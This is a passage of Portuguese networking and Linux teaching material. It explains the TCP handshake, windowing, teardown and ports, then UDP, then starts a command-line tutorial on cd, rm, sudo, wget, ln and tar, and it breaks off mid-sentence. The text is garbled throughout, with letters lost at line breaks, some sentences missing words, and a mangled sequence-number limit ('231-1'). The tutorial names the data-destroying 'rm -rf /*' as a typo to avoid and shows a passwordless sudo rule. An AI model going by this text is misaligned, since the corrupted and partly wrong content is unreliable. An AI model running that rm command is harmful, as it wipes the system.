dor aceite a ligação enviando um pacote SYN+ACK. Se, durante um determinado espaço de
tempo, esse pacote não for recebido ocorre um timeout e o pacote SYN é reenviado. O
estabelecimento da ligação é concluído por parte do cliente, confirmando a aceitação do ser
idor respondendo-lhe com um pacote ACK.
Durante estas trocas, são trocados números de sequência iniciais (ISN) entre os interl
ocutores que irão servir para identificar os dados ao longo do fluxo, bem como ser
vir de contador de bytes transmitidos durante a fase de transferência de dados (se
ssão).
No final desta fase, o servidor inscreve o cliente como uma ligação estabelecida num
a tabela própria que contém um limite de conexões, o backlog. No caso do backlog ficar
completamente preenchido a ligação é rejeitada ignorando (silenciosamente) todos os s
ubsequentes pacotes SYN.
[editar] Transferência de dados (sessão)
Durante a fase de transferência o TCP está equipado com vários mecanismos que assegura
m a confiabilidade e robustez: números de sequência que garantem a entrega ordenada,
código detector de erros (checksum) para detecção de falhas em segmentos específicos, c
onfirmação de recepção e temporizadores que permitem o ajuste e contorno de eventuais at
rasos e perdas de segmentos.
Como se pode observar pelo cabeçalho TCP, existem permanentemente um par de números
de sequência, doravante referidos como número de sequência e número de confirmação (ACKnowl
dgement). O emissor determina o seu próprio número de sequência e o receptor confirma
o segmento usando como número ACK o número de sequência do emissor. Para manter a conf
iabilidade, o receptor confirma os segmentos indicando que recebeu um determinad
o número de bytes contíguos. Uma das melhorias introduzidas no TCP foi a possibilida
de do receptor confirmar blocos fora da ordem esperada. Esta característica design
a-se por selective ACK, ou apenas SACK.
A remontagem ordenada dos segmentos é feita usando os números de sequência, de 32 bit,
que reiniciam a zero quando ultrapassam o valor máximo, 231-1, tomando o valor da
diferença. Assim, a escolha do ISN torna-se vital para a robustez deste protocolo
.
O campo checksum permite assegurar a integridade do segmento. Este campo é express
o em complemento para um consistindo na soma dos valores (em complemento para um
) da trama. A escolha da operação de soma em complemento para um deve-se ao facto de
esta poder ser calculada da mesma forma para múltiplos desse comprimento - 16 bit
, 32 bit, 64 bit, etc - e o resultado, quando encapsulado, será o mesmo. A verific
ação deste campo por parte do receptor é feita com a recomputação da soma em complemento p
ara um que dará -0 caso o pacote tenha sido recebido intacto.
Esta técnica (checksum), embora muito inferior a outros métodos detectores, como o C
RC, é parcialmente compensada com a aplicação do CRC ou outros testes de integridade m
elhores ao nível da camada 2, logo abaixo do TCP, como no caso do PPP e Ethernet.
Contudo, isto não torna este campo redundante: com efeito, estudos de tráfego revela
m que a introdução de erro é bastante frequente entre hops protegidos por CRC e que es
te campo detecta a maioria desses erros.
As confirmações de recepção (ACK) servem também ao emissor para determinar as condições da
e. Dotados de temporizadores, tanto os emissores como receptores podem alterar o
fluxo dos dados, contornar eventuais problemas de congestão e, em alguns casos, p
revenir o congestionamento da rede. O protocolo está dotado de mecanismos para obt
er o máximo de performance da rede sem a congestionar o envio de tramas por um emi
ssor mais rápido que qualquer um dos intermediários (hops) ou mesmo do receptor pode
inutilizar a rede. São exemplo a janela deslizante, o algoritmo de início-lento
[editar] Adequação de parâmetros

Neste simples exemplo só está a ser considerada a janela do servidor. O cliente tem
a percepção do estado da janela do servidor a cada ACK recebido.
O cabeçalho TCP possui um parâmetro que permite indicar o espaço livre atual do recept
or (emissor quando envia a indicação): a janela (ou window). Assim, o emissor fica a
saber que só poderá ter em trânsito aquela quantidade de informação até esperar pela confi
mação (ACK) de um dos pacotes - que por sua vez trará, com certeza, uma atualização da jan
ela. Curiosamente, a pilha TCP no Windows foi concebida para se auto-ajustar na
maioria dos ambientes e, nas versões atuais, o valor padrão é superior em comparação com v
ersões mais antigas.
Porém, devido ao tamanho do campo, que não pode ser expandido, os limites aparentes
da janela variam entre 2 e 65535, o que é bastante pouco em redes de alto débito e h
ardware de alta performance. Para contornar essa limitação é usado uma Opção especial que
permite obter múltiplos do valor da janela, chamado de escala da janela, ou TCP wi
ndow scale; este valor indica quantas vezes o valor da janela, de 16 bit, deve s
er operado por deslocamento de bits (para a esquerda) para obter os múltiplos, pod
endo variar entre 0 e 14. Assim, torna-se possível obter janelas de 1 gigabyte. O
parâmetro de escala é definido unicamente durante o estabelecimento da ligação.
[editar] Término da ligação

Término de conexão.
A fase de encerramento da sessão TCP é um processo de quatro fases, em que cada inte
rlocutor responsabiliza-se pelo encerramento do seu lado da ligação. Quando um deles
pretende finalizar a sessão, envia um pacote com a flag FIN ativa, ao qual deverá r
eceber uma resposta ACK. Por sua vez, o outro interlocutor irá proceder da mesma f
orma, enviando um FIN ao qual deverá ser respondido um ACK.
Pode ocorrer, no entanto, que um dos lados não encerre a sessão. Chama-se a este tip
o de evento de conexão semi-aberta. O lado que não encerrou a sessão poderá continuar a
enviar informação pela conexão, mas o outro lado não.
[editar] Portas ou serviços
O TCP introduz o conceito de porta tipicamente associado a um serviço (camada apli
cação)/ligação específica. Assim, cada um dos intervenientes na conexão dispõe de uma porta
sociada (um valor de 16 bit) que dificilmente será o mesmo do interlocutor. Alguns
serviços (que fazem uso de protocolos específicos) são tipicamente acessíveis em portas
fixas, conhecidas como portas bem conhecidas, que são aqueles numerados do 1 ao 1
023. Além destas, existem ainda duas gamas de portas, registradas e privadas ou di
nâmicas. As portas bem conhecidas são atribuídas pela Internet Assigned Numbers Author
ity (IANA) e são tipicamente utilizados por processos com direitos de sistema ou s
uper-utilizador. Nestas portas encontram-se em escuta passiva os serviços triviais
, como HTTP, SSH, FTP, etc. Todos os protocolos da suite IP se encontram registr
ados dentro desta gama.
A gama de portas privadas segue regras de atribuição específicas do sistema operativo
e serve para abrir ligações a outras máquinas, como surfar na rede, por exemplo.[edita
r] Utilização do IP para entrega de dados
User Datagram Protocol
O User Datagram Protocol (UDP) é um protocolo simples da camada de transporte. Ele
é descrito na RFC 768 e permite que a aplicação escreva um datagrama encapsulado num
pacote IPv4 ou IPv6, e então enviado ao destino. Mas não há qualquer tipo de garantia
que o pacote irá chegar ou não.
O protocolo UDP não é confiável. Caso garantias sejam necessárias, é preciso implementar u
ma série de estruturas de controle, tais como timeouts, retransmissões, acknowlegmen
ts, controle de fluxo, etc. Cada datagrama UDP tem um tamanho e pode ser conside
rado como um registro indivisível, diferentemente do TCP, que é um protocolo orienta
do a fluxos de bytes sem início e sem fim.
Também dizemos que o UDP é um serviço sem conexão, pois não há necessidade de manter um rel
cionamento longo entre cliente e o servidor. Assim, um cliente UDP pode criar um
socket, enviar um datagrama para um servidor e imediatamente enviar outro datag
rama com o mesmo socket para um servidor diferente. Da mesma forma, um servidor
poderia ler datagramas vindos de diversos clientes, usando um único socket.
O UDP também fornece os serviços de broadcast e multicast, permitindo que um único cli
ente envie pacotes para vários outros na rede.
Funcionamento
O UDP dá às aplicações acesso direto ao serviço de entrega de datagramas, como o serviço de
entrega que o IP dá. O UDP é pouco confiável, sendo um protocolo não orientado para cone
xão. Não existem técnicas no protocolo para confirmar que os dados chegaram ao destino
corretamente. O UDP usa número de porta de origem e de destino de 16 bits.
O UDP é um acrónimo do termo inglês User Datagram Protocol que significa protocolo de
datagramas de utilizador (ou usuário). O UDP faz a entrega de mensagens independen
tes, designadas por datagramas, entre aplicações ou processos, em sistemas host. A e
ntrega pode ser feita fora de ordem e datagramas podem ser perdidos. A integrida
de dos dados pode ser conferida por um "checksum" (um campo no cabeçalho de checag
em por soma) baseado em complemento de um, de 16 bits.
Os pontos de acesso do UDP são geralmente designados por "Portas de protocolo" ou
"portas" ou até "portos", em que cada unidade de transmissão de dados UDP identifica
o endereço IP e o número de porta do destino e da fonte da mensagem, os números poden
do ser diferentes em ambos os casos.
A diferença básica entre o UDP e o TCP é o fato de que o TCP é um protocolo orientado à co
nexão e, portanto, inclui vários mecanismos para iniciar, manter e encerrar a comuni
cação, negociar tamanhos de pacotes, detectar e corrigir erros, evitar congestioname
nto do fluxo e permitir a retransmissão de pacotes corrompidos, independente da qu
alidade do meio físicos.
No UDP, por sua vez, é feito para transmitir dados pouco sensíveis, como fluxos de áud
io e vídeo, ou para comunicação sem conexão como é o caso da negociação DHCP ou tradução de
s por DNS. No UDP não existem verificações, nem confirmações. Os dados são transmitidos ape
as uma vez, incluindo apenas um frágil, e opcional, sistema de CRC de 16 bits. Os
pacotes que chegam corrompidos são simplesmente descartados, sem que o emissor seq
uer saiba do problema. Por outro lado, a ausência de estruturas de controle comple
xas garante ao UDP alta eficiência, já que cada pacote é composto praticamente somente
por dados.
[editar] Cabeçalho UDP
O cabeçalho UDP é extremamente simples, contendo apenas os números de porta, comprimen
to da mensagem e o checksum. O cabeçalho dos datagramas UDP é colocado a seguir ao c
abeçalho IP.
Porta origem Porta destino
Comprimento da mensagem Checksum
Os campos em laranja são opcionais. A porta de origem geralmente especifica a port
a desejada de resposta, mas pode ser omitida. Isso tipicamente ocorre em comunic
ações broadcast ou mensagens de pânico, que notificam sobre a queda de um equipamento.
[editar] Seleção do número de portas no UDP
Os computadores que pretendem estabelecer uma comunicação devem definir um número de p
orta. Para o servidor (Processo), e aguarda pela chegada de mensagens, datagrama
s, o cliente seleciona uma porta local, para recebimento de datagramas e envia d
atagramas para a porta selecionada para o processo do servidor. Muitos serviços co
nhecidos usam números de portas reservados, por exemplo: 161 para o Protocolo SNMP
.
[editar] Vantagens do uso do UDP
O UDP é uma escolha adequada para fluxos de dados em tempo real, especialmente aqu
eles que admitem perda ou corrompimento de parte de seu conteúdo, tais como vídeos o
u voz. Aplicações sensíveis a atrasos na rede, mas poucos sensíveis a perdas de pacotes,
como jogos de computadores, também podem se utilizar do UDP. As garantias de TCP
envolvem retransmissão e espera de dados, como consequência, intensificam os efeitos
de uma alta latência de rede.
O UDP também suporta broadcasting e multicasting. Caso esses recursos sejam necessá
ios, o UDP deverá necessariamente ser utilizado. Algum tratamento de erro pode ser
adicionado, mas geralmente aplicações multicast também admitem perda de parte dos pac
otes ou fazem retransmissões constantes (tal como o ocorre no protocolo DHCP).
O UDP não perde tempo com criação ou destruição de conexões. Durante uma conexão, o
apenas 2 pacotes, enquanto no TCP esse número é superior a 10. Por isso, aplicações que
encaixam num modelo de pergunta-resposta também são fortes candidatas a usar UDP. En
tretanto, pode ser necessário implementar algoritmos de timeouts, acks e, no mínimo,
retransmissão. Nesse caso, vale lembrar que se a troca de mensagens for muito int
ensa, o protocolo TCP pode voltar a ser vantajoso, já que seu custo de conexão será am
ortizado.
Embora o processamento dos pacotes UDP seja realmente mais rápido, quando as garan
tias de confiabilidade e ordenação são necessárias, é pouco provável que uma implementação
P obterá resultados melhores do que o uso direto do TCP. Em primeiro lugar, corre-
se o risco de que uma implementação ingênua feita em UDP seja menos eficiente do que o
s algoritmos já testados e otimizados presentes no TCP. Em segundo lugar, boa part
e do protocolo TCP, nos principais sistemas operacionais, opera em modo núcleo, te
ndo portanto uma execução mais privilegiada do que um protocolo de aplicação teria. Fina
lmente, é válido lembrar que muitas placas de rede já possuem o TCP programado em seu
firmware o que permite, por exemplo, o cálculo de checksum por hardware. Por isso,
o protocolo UDP não deveria ser utilizado para fluxos de bytes confiáveis, tais com
o a transferência de arquivos. Como exemplo, podemos citar o protocolo TFTP, exceção a
essa regra, que foi feito para redes locais, de alta confiabilidade. Na interne
t, seu desempenho é muito inferior ao sua versão confiável, o protocolo FTP.

PRÓXIMO: BASH_COMPLETION E PATH


CMD
Introdução
Ter fluência no uso da linha de comando é um pré-requisito para qualquer bom administr
ador. Usar o prompt é, de certa forma, muito parecido com aparecer uma segunda língu
a, onde os comandos equivalem às palavras e a sintaxe e os argumentos usados equiv
alem à gramática. A única forma de adquirir um bom vocabulário e, principalmente, de ent
ender a gramática é estudando, mas, por outro lado, a única forma de adquirir fluência é r
ealmente falando, o que na nossa analogia equivale a acumular "horas de vôo" no us
o do terminal.
No começo é normal que você fique catando milho e precise pesquisar e olhar as páginas d
e manual para se lembrar mesmo dos comandos mais simples, mas, com o tempo, usar
o terminal acaba sendo uma coisa tão natural quanto falar ou escrever. O importan
te é não desanimar.
Este é um tutorial de duas partes destinado a servir como uma guia de referência par
a o uso da linha de comando e dos utilitários básicos de administração do sistema. Ela não
tem o objetivo de esgotar o assunto, mas pode ter certeza que encontrará muitas d
icas.
Vamos começar com uma revisão dos comandos básicos do terminal, junto com algumas dica
s úteis.
cd : Possivelmente o comando mais básico do prompt, permite navegar entre diretórios
, como em "cd /etc". Você pode tanto indicar o caminho completo até o diretório deseja
do, como em "cd /var/log/apache2", ou usar caminhos relativos, indicando o desti
no a partir do diretório atual. Se você está dentro da pasta "/etc" e quer acessar a p
asta "/etc/bind", precisa digitar apenas "cd bind". Para subir um diretório, use "
cd .." e, para subir dois níveis, use "cd ../..".
pwd : Serve apenas para confirmar o diretório atual. É usado sem parâmetros, simplesme
nte "pwd".
ls : Lista os arquivos dentro do diretório atual. Por padrão, ele mostra apenas os n
omes dos arquivos e não mostra os arquivos ocultos. Para ver tudo, incluindo os ar
quivos ocultos, use "ls -a", para ver também as permissões de acesso e o tamanho dos
arquivos, use o "ls -la". Para ver os tamanho dos arquivos especificados de for
ma legível ("329M" em vez de "344769698") adicione o parâmetro "h", como em "ls -lha
". Você pode ver também os arquivos de qualquer diretório, sem ter que primeiro precis
ar usar o "cd" para acessá-lo. Para isso, basta indicar o diretório, como "ls -lha /
etc".
Em muitas distribuições, como no CentOS, o "ls" mostra uma listagem colorida, que to
rna fácil identificar os arquivos (pastas aparecem em azul, arquivos compactados e
m vermelho e assim por diante), o que torna mais fácil identificar os arquivos. Pa
ra ativar esse recurso em outras distribuições, adicione a linha:
alias ls="ls --color=auto"
... no final do arquivo "/etc/profile".
Outra personalização muito usada é fazer com que os comandos "rm", "cp" e "mv" peçam con
firmação, o que reduz a possibilidade de causar danos catastróficos ao digitar comando
s incorretos. Para isso, adicione as três linhas abaixo no final do arquivo "/etc/
profile":
alias rm="rm -i"
alias mv="mv -i"
alias cp="cp -i"
cp : O cp é um comando aparentemente simples, mas que esconde vários segredos. A sin
taxe básica para copiar arquivos é usar o comando cp, seguido do nome do arquivo e a
pasta para onde ele vai, como em "cp /etc/fstab /tmp". Entretanto, em sua forma
básica o cp serve apenas para copiar arquivos isolados; para copiar pastas, é neces
sário que você adicione a opção "-r" (que ativa a cópia recursiva), como em "cp -r /home/g
dh/* /backup/".
Um parâmetro bastante útil é o "-a", que faz com que o cp sempre copie recursivamente,
mantenha as permissões do arquivo original e preserve os links simbólicos que encon
trar pelo caminho. Em resumo, faz o cp se comportar de uma forma mais simples e
lógica, por isso você acaba usando-o quase sempre, em substituição ao "-r", como em:
# cp -a /var/www /mnt/sda2/backup/
Você pode ainda usar o "*" e a "?" como curingas quando quiser copiar vários arquivo
s. Para copiar todos os arquivos da pasta atual para a pasta "/mnt/hda6", por ex
emplo, use "cp * /mnt/hda6". A "?" por sua vez é mais contida, substituindo um único
caractere. Por exemplo, "cp arquivo?.txt /mnt/hda6", copia o "arquivo1.txt", "a
rquivo2.txt" e o "arquivo3.txt", mas não o "arquivo21.txt".
mv : O mv serve tanto para mover arquivos de um lugar para o outro, quanto para
renomear arquivos, como em:
# cd /etc/squid
# mv squid.conf squid.conf.modelo
rm : Por padrão, o rm deleta apenas arquivos simples, como em "rm arquivo.txt". Pa
ra que ele remova pastas, é necessário adicionar parâmetro "-r", como em "rm -r arquiv
os/". Em muitas distribuições, o padrão do rm é pedir confirmação antes de remover cada arq
ivo, o que se torna inviável ao remover um diretório com diversos arquivos. A confir
mação é eliminada ao adicionar o parâmetro "-f", o que nos leva ao "rm -rf" (que é o forma
to mais comumente usado).
Tome cuidado ao usar o "-rf", pois ele não pede confirmação, deleta os arquivos direta
mente. Você pode muito bem pensar em digitar "rm -rf ./*" (para apagar todos os ar
quivos do diretório atual) e, na pressa, acabar digitando "rm -rf /*", que apaga t
odos os arquivos do sistema, incluindo arquivos em todas as partições e em todos os
compartilhamentos de rede que estiverem montados (!). Ou seja, ao usá-lo, respire
fundo e verifique se realmente está deletando a pasta certa antes de pressionar En
ter.
É possível também usar caracteres curingas na hora de remover arquivos. Para remover t
odos que possuírem a extensão ".jpg", use "rm -f *.jpg". Para remover todos os arqui
vos que começarem com "img", use "rm -f img*". Lembre-se de que você pode usar também
o "?" quando quiser usar o curinga para apenas um caractere específico. Se você quis
er remover os arquivos "doc1.txt", "doc2.txt" e "doc3.txt", mas sem remover o "d
oc10.txt" e o "doc11.txt", você poderia usar o comando "rm -f doc?.txt".
mkdir : Cria diretórios, como em "mkdir trabalhos" ou "mkdir /mnt/backup". Para cr
iar pastas recursivamente (ou seja, criar todas as pastas necessárias até chegar a q
ue você pediu, caso necessário), adicione o parâmetro "-p", como em:
# mkdir -p /var/log/apache2
rmdir : Remove diretórios. A diferença entre ele e o "rm -f" é que o rmdir remove apen
as diretórios vazios, evitando acidentes.
du : O du permite ver uma lista com o espaço ocupado por cada pasta dentro do dire
tório atual. É uma forma rápida de encontrar grandes arquivos ou pastas que estão consum
indo muito espaço, como no caso de logs não rotacionados que crescem a ponto de ameaça
rem ocupar todo o espaço livre na partição raiz do sistema.
man : É impossível para um ser humano (pelo pelo para um ser humano normal ;) memori
zar todos os parâmetros de mais do que um punhado de comandos. Assim como em outra
s áreas, você memoriza os parâmetros que usa com mais freqüência e tem apenas uma vaga noçã
obre os demais.
O prompt inclui um sistema de ajuda bastante detalhado, acessível através do comando
man. Não apenas os comandos, mas também a grande maioria dos arquivos de configuração p
ossuem páginas de manual com os parâmetros suportados. O principal objetivo das página
s de manual é listar as opções suportadas e não necessariamente serem uma leitura didática
. Elas são mais úteis quando você já tem uma boa noção sobre o que o comando faz e precisa
e lembrar de uma opção específica do que como um guia de estudos. Para usar, basta cha
mar o "man" seguido do comando desejado, como em "man ls".
Dentro do leitor, use as setas para rolar a tela e, para sair, pressione a tecla
"q". Como falei, existem manuais também para a muitos dos arquivos de configuração. E
xperimente usar o "man fstab" ou "man resolv.conf", por exemplo.
Um pequeno truque é que você pode salvar o conteúdo das páginas do man em arquivos de te
xto (de forma a abrí-los em outro editor de texto, ou imprimir), direcionando a saíd
a do comando para o arquivo desejado, como em:
$ man ls > ls.txt
A seta faz com que a saída do comando seja direcionada, indo para dentro do arquiv
o em vez de ser exibida na tela. O arquivo é automaticamente criado, caso não exista
. Ao usar uma única seta (>) como no exemplo, o conteúdo do arquivo é subscrito, por i
sso é preciso um certo cuidado ao usar. Outra opção é usar duas setas (>>), o que faz co
m que o conteúdo seja adicionado ao final do arquivo, em vez de substituir o conteúd
o anterior. As setas são exaustivamente usadas em shell scripts, pois permitem dir
ecionar a saída de um comando para o outro, permitindo que eles sejam combinados d
as mais diversas formas.
Devido à quantidade de parâmetros disponíveis, os manuais de muitos programas são muito
longos e complicados. Por isso, muitos suportam o parâmetro "--help", que exibe um
a ajuda resumida, contendo apenas os parâmetros mais usados. Experimente, por exem
plo, o "ls --help". Se você quiser apenas uma descrição rápida do que um determinado com
ando faz, experimente o comando "whatis" (o que é), como em: "whatis ls".
Mais uma variante do man é o comando "info", que contém manuais alternativos para mu
itos comandos. Enquanto os manuais do man são técnicos, desenvolvidos para serem man
uais de referência, os do info normalmente utilizam uma linguagem mais simples, ab
ordando apenas as opções mais comuns. Nem todos os comandos possuem uma página info, m
as o número vem crescendo. Para usá-lo, basta digitar "info comando", como em "info
ls". Se por acaso o comando "info" não estiver disponível, instale-o usando o gerenc
iador de pacotes, como em "apt-get install info".
locate : Este é outro comando bastante útil. Ele permite encontrar arquivos de forma
instantânea, servindo como uma espécie de busca indexada. Assim como mecanismos de
busca, como o Google, o locate não sai procurando em todo o HD até achar o arquivo q
ue pediu; ele procura apenas dentro de uma base de dados, que contém os nomes de t
odos os arquivos. Esta base é gerada ao rodar o comando "updatedb", que precisa se
r executado pelo menos uma vez antes que você possa usá-lo.
A vantagem de usar a base de dados é que as buscas são instantâneas, a desvantagem é que
você precisa rodar o updatedb (como root) de vez em quando, a fim de incluir as últ
imas modificações. Para procurar um arquivo, simplesmente use "locate arquivo". Se v
ocê está procurando por um programa, experimente o comando "which", uma variante do
locate que mostra apenas executáveis.
find : O find também permite localizar arquivos, mas funciona da forma tradicional
, realmente vasculhando os diretórios em busca dos arquivos, ao invés de usar uma ba
se de dados, como o locate. Embora seja lento ao procurar em diretórios com muitos
arquivos e subdiretórios, o find é eficiente se você souber previamente onde procurar
. Por exemplo, o diretório "/etc" concentra as configurações do sistema. Se você estiver
procurando pelo arquivo "smb.conf" (onde é armazenada a configuração do Samba), você po
deria ir direto à fonte, usando o comando "find /etc -name smb.conf".
Note que além do diretório onde ele vai procurar (/etc no exemplo), você deve usar o p
arâmetro "-name" antes de indicar o nome do arquivo que está procurando. Omitindo o
diretório, ele simplesmente procura dentro do diretório atual. Você pode também fazer bu
scas por todos os arquivos com uma determinada extensão, como em "find /mnt/hda6 -
name *.mp3".
su: No Linux, existe uma separação clara entre o root e os demais usuários do sistema.
O root é o único que pode alterar a configuração do sistema e usar a maior parte das fe
rramentas de configuração. Os usuários normais, por sua vez, podem usar os programas i
nstalados e modificar arquivos dentro do seu diretório home. Esta organização permite
que várias pessoas usem o mesmo micro (o que é vital no caso dos servidores), sem qu
e um possa alterar as configurações do outro, nem muito menos mudar as configurações do
sistema.
O su permite que você se "promova" a root a qualquer momento. O uso básico é simplesme
nte digitar "su -", seguido da senha, como em:
$ su -
Password:
O "$" do terminal vira um "#", alertando que a partir daí você tem plenos poderes. S
e ao tentar abrir arquivos gráficos você receber uma mensagem dizendo que não é possível s
e conectar ao X, experimente usar o comando "sux" (se ele não estiver disponível, in
stale o pacote "sux") no lugar do su. Ele configura as permissões do servidor X co
rretamente.
sudo : O Ubuntu e outras distribuições derivadas dele utilizam o sudo como um substi
tuto à senha de root. Neles, a conta de root vem desativada por padrão e você executa
comandos como root incluindo o "sudo" no início do comando, como em "sudo gedit /e
tc/fstab". Se preferir voltar ao sistema tradicional, usando o "su -" para se lo
gar como root, basta destravar a conta de root usando o comando "sudo passwd".
Assim como outros utilitários, o sudo possui um arquivo de configuração, o "/etc/sudoe
rs", que permite definir quais usuários poderão usar o sudo e dentro de quais limitações
. No Ubuntu, apenas o usuário administrativo criado durante a instalação pode usar o s
udo, o que é determinado pela linha:
%admin ALL=(ALL) ALL
... dentro do arquivo. Isso faz com que todos os usuários do grupo "admin" (que or
iginalmente contém apenas o usuário criado durante a instalação) possam usar o sudo para
executar qualquer comando (ALL). Por segurança, o sudo solicita sua senha de usuári
o ao executar qualquer comando, uma última linha de proteção contra a possibilidade de
alguém usar seu micro quando você não estiver por perto. Se preferir desativar a veri
ficação, substitua a linha por:
%admin ALL=NOPASSWD: ALL
Se quiser "promover" outros logins, criados depois da instalação, de forma que eles
também possam executar comandos usando o sudo, basta adicioná-los ao grupo "admin",
como em:
# adduser gdh admin
cat : Além de permitir ver rapidamente o conteúdo de um arquivo, como em "cat /etc/f
stab", ele também pode ser combinado com outros comandos para realizar tarefas mai
s complexas. Por exemplo, se você tem um arquivo "boot.img" com a imagem de um dis
quete de boot, não bastaria simplesmente copiar o arquivo para o disquete com o co
mando cp; você precisaria fazer uma cópia bit a bit. Existem várias formas de fazer is
so, mas uma solução simples seria usar o comando "cat boot.img > /dev/fd0". Neste ca
so, ele lista o conteúdo do arquivo, mas ao invés de mostrar na tela ele o escreve n
o disquete (/dev/fd0). Você verá muitos usos úteis para estes recursos especiais ao es
tudar sobre shell script.
&: No Linux, todos os aplicativos, mesmo os gráficos, podem ser chamados a partir
de uma janela de terminal. O problema é que, ao chamar algum aplicativo, o termina
l ficará bloqueado até que o aplicativo seja finalizado, obrigando-lhe a abrir um pa
ra cada programa.
Acrescentar o & no final do comando, como em "gedit /etc/fstab &" resolve este p
roblema, mantendo o terminal livre. Se você esquecer de acrescentar ao "&" ao abri
r um programa, ainda pode "destravar" o terminal pressionando "Ctrl+Z" (que para
lisa o programa e te devolve o controle do terminal) e depois "bg", que reinicia
o programa em background.
Alguns aplicativos exibem mensagens diversas e avisos depois de serem abertos, o
que "suja" o terminal, mas sem comprometer o que você está fazendo. Se isto te inco
modar, você pode adicionar um "&>/dev/null" ao comando, o que descarta todas as me
nsagens, como em:
$ konqueror ~ & &>/dev/null
O "~" é uma variável do terminal, que representa seu diretório home. Você pode usá-lo para
abreviar comandos: para copiar a pasta "/mnt/sdc1/arquivos" para sua pasta home
, você pode usar "cp -a /mnt/sdc1/arquivos ~", ao invés de digitar "cp -a cp -a /mnt
/sdc1/arquivos /home/gdh", por exemplo.
head: Este é um dos primos do cat, ele permite ver apenas as primeiras linhas do a
rquivo, ao invés de exibir tudo. Basta especificar o número de linhas que devem ser
exibidas, como por exemplo "head -20 /var/log/apache2/access.log".
Outro parente distante é o tail (cauda), que mostra as últimas linhas do arquivo. O
uso é o mesmo, basta indicar o número de linhas que devem ser mostradas e o nome do
arquivo, como em "tail -50 /var/log/squid/access.log". Como pode imaginar, ele é m
uito útil para acompanhar arquivos de log, que são atualizados continuamente. Como a
s novas entradas destes arquivos vão sendo inseridas no final do arquivo, o tail p
ermite verificar rapidamente apenas as novas inclusões, sem precisar perder tempo
abrindo o arquivo inteiro.
Você pode obter um monitor de logs simples combinando o tail com o comando "watch"
, que permite executar um comando a cada 2 segundos, atualizando a tela automati
camente. Para acompanhar os logs de acesso do seu servidor web, por exemplo, você
poderia usar:
# watch tail -n 20 /var/log/apache2/access.log
Para acompanhar os logs do Squid, você usaria:
# watch tail -n 20 /var/log/squid/access.log
... e assim por diante.
| (pipe): Junto com as setas de redirecionamento (> e >>), o pipe ( | ) é muito us
ado em scripts e comandos diversos. Ele permite fazer com que a saída de um comand
o seja enviada para outro ao invés de ser mostrada na tela. Parece uma coisa muito
exótica, mas acaba sendo incrivelmente útil, pois permite "combinar" diversos coman
dos que originalmente não teriam nenhuma relação entre si, de forma que eles façam algum
a coisa específica.
Um dos usos mais corriqueiros é usar o pipe e o grep para filtrar a saída de outros
comandos, procurando por alguma informação específica. Imagine por exemplo que você quer
ver todas as entradas referentes a um determinado endereço IP no log do Apache (o
u do Squid, ou de qualquer outro serviço). Você pode usar o comando cat para exibir5
o arquivo de log e usar o pipe e o grep para filtrar a saída, de forma que ele ex
iba apenas linhas contendo algum endereço específico, como em:
# cat /var/log/apache2/access.log | grep 200.101.213.68
Outro exemplo simples: sua placa de rede não está funcionando e você quer saber se o mód
ulo de kernel "sis900", que dá suporte a ela, está carregado. Você pode ver os módulos q
ue estão carregados usando o comando "lsmod", mas a lista é um pouco longa. Você poder
ia completar o lsmod com "| grep sis900", que vai filtrar usando o grep, mostran
do na tela apenas as linhas contendo "sis900". O comando ficaria então "lsmod | gr
ep sis900". Se não aparecer nada na tela, você sabe de antemão que o módulo não está ativo,
Neste caso, você poderia tentar carregá-lo manualmente usando o comando "modprobe si
s900", como root.
wget : O wget é um gerenciador de downloads bastante competente, que oferece um gr
ande volume de opções, todas usadas via linha de comando. Isso torna ele ideal para
situações em que você está acessando um servidor remoto via SSH e precisa baixar um gran
de arquivo, ou um pacote de instalação. Em vez de primeiro baixar o arquivo para a s
ua máquina e depois transferí-lo para o servidor, você pode fazer com que o arquivo se
ja baixado diretamente pelo servidor, economizando tempo.
O uso mais básico é usar o wget seguido da opção "-c", que faz com que ele continue o do
wnload caso interrompido, como em:
# wget -c http://download3.vmware.com/software/vmserver/VMware-server-1.0.5-8018
7.tar.gz
Caso a conexão esteja ruim e a transferência esteja parando freqüentemente, você pode es
pecificar um timeout usando a opção "-T", ela faz com que o wget reinicie a transferên
cia caso não receba dados dentro do tempo especificando (em segundos), como em:
# wget -c -T 30 http://download3.vmware.com/software/vmserver/VMware-server-1.0.
5-80187.tar.gz
Uma dica é que você pode selecionar a URL do arquivo a ser baixado na janela do nave
gador e colar o texto no terminal usando o botão central do mouse. Se você estiver u
sando o konsole ou o nome-terminal, você pode também colar o texto da área de transferên
cia clicando com o botão direito sobre o terminal e usando a opção "colar".
ln : O comando ln permite criar links. Existem dois tipos de links suportados pe
lo Linux, os hard links e os soft links (também chamados de links simbólicos) Os sof
t links são os mais simples e também os mais usados, eles desempenham a função de um ata
lho simples, que aponta para um arquivo ou pasta.
O sistema trata o link da mesma forma que o arquivo, de forma que ao gravar info
rmações no link, ou acessar seu conteúdo você está na verdade trabalhando diretamente no a
rquivo. A principal exceção é que ao mover, deletar ou renomear o link, você altera apen
as o link propriamente dito e não o arquivo. Um soft link é um atalho estático, ao mov
er ou deletar o arquivo, o link fica quebrado.
Os hard links por sua vez são mais intimamente ligados ao arquivo e são alterados ju
nto com ele. Se o arquivo muda de lugar, o link é automaticamente atualizado. Isto
é possível porque nos sistemas de arquivos usados pelo Linux cada arquivo possui um
código de identificação (o inode), que nunca muda. O sistema sabe que o arquivo renom
eado é o mesmo do atalho simplesmente procurando-o pelo inode ao invés do nome. A gr
ande limitação é que os hard links podem ser criados apenas se o link e o arquivo de d
estino estão dentro da mesma partição. Este é um dos motivos dos links simbólicos serem ma
is usados.
Se usado sem argumentos, o comando ln cria um hard link, como em:
$ ln /var/www/gdhpress/arquivo /home/gdhpress/arquivo
Para criar um link simbólico, acrescente o argumento "-s", como em:
$ ln -s /var/www/gdhpress/html/ /home/gdhpress/html
Você verá muitos links espalhados pela estrutura de diretórios do Linux, um recurso mu
ito usado quando os arquivos de sistemas mudam de lugar numa nova versão. Mantendo
um link na localização antiga, todos os programas antigos continuam funcionando.
tar : O comando tar pode ser usado para empacotar, compactar e descompactar arqu
ivos, por isso ele acaba sendo uma ferramenta extremamente usada. Por exemplo, p
ara descompactar um arquivo com a extensão .tar.gz, pelo terminal, você usaria o com
ando:
$ tar -zxvf arquivo.tar.gz
Aqui o "tar" é o comando e o "-zxvf" são parâmetros passados para ele. O tar permite t
anto compactar quanto descompactar arquivos e pode trabalhar com muitos formatos
de arquivos diferentes, por isso é necessário especificar que ele deve descompactar
o arquivo (-x) e que o arquivo está comprimido no formato gzip (z). O "v" é na verd
